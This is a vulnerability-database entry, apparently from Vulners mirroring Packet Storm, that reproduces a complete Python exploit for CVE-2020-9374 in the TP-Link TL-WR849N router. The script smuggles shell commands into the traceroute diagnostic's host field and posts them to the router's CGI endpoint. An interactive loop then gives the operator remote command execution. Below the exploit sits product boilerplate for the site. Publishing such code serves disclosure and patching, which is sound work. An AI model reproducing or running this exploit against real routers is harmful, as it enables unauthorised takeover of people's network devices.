Lucene search
K

TP-Link TL-WR849N Remote Code Execution

🗓️ 02 Mar 2020 00:00:00Reported by Elber TavaresType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 149 Views

TP-Link TL-WR849N Remote Code Execution, CVE-2020-9374, Linux, Window

Related
Code
`# Exploit Title: TP LINK TL-WR849N - Remote Code Execution  
# Date: 2019-11-20  
# Exploit Author: Elber Tavares  
# Vendor Homepage: https://www.tp-link.com/  
# Software Link: https://www.tp-link.com/br/support/download/tl-wr849n/#Firmware  
# Version: TL-WR849N 0.9.1 4.16  
# Tested on: linux, windows  
# CVE : CVE-2020-9374  
  
  
import requests  
  
def output(headers,cookies):  
url = 'http://192.168.0.1/cgi?1'  
data = ''  
data += '[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,3\x0d\x0a'  
data += 'diagnosticsState\x0d\x0a'  
data += 'X_TP_HopSeq\x0d\x0a'  
data += 'X_TP_Result\x0d\x0a'  
r = requests.post(url,data=data,headers=headers,cookies=cookies)  
saida = r.text  
filtro = saida.replace(': Name or service not known','')  
filtro = filtro.replace('[0,0,0,0,0,0]0','')  
filtro = filtro.replace('diagnosticsState=','')  
filtro = filtro.replace('X_TP_HopSeq=0','')  
filtro = filtro.replace('X_TP_Result=','')  
print(filtro[:-8])  
  
def aceppt(headers,cookies):  
url = 'http://192.168.0.1/cgi?7'  
data = '[ACT_OP_TRACERT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\x0d\x0a'  
r = requests.post(url,data=data,headers=headers,cookies=cookies)  
output(headers,cookies)  
  
  
def inject(command,headers,cookies):  
url = 'http://192.168.0.1/cgi?2'  
data = ''  
data += '[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,8\x0d\x0a'  
data += 'maxHopCount=20\x0d\x0a'  
data += 'timeout=5\x0d\x0a'  
data += 'numberOfTries=1\x0d\x0a'  
data += 'host=\"$('+command+')\"\x0d\x0a'  
data += 'dataBlockSize=64\x0d\x0a'  
data += 'X_TP_ConnName=ewan_pppoe\x0d\x0a'  
data += 'diagnosticsState=Requested\x0d\x0a'  
data += 'X_TP_HopSeq=0\x0d\x0a'  
r = requests.post(url,data=data,headers=headers,cookies=cookies)  
aceppt(headers,cookies)  
  
  
  
def main():  
cookies = {"Authorization": "Basic REPLACEBASE64AUTH"}  
headers = {'Content-Type': 'text/plain',  
'Referer': 'http://192.168.0.1/mainFrame.htm'}  
while True:  
command = input('$ ')  
inject(command,headers,cookies)  
  
  
main()  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation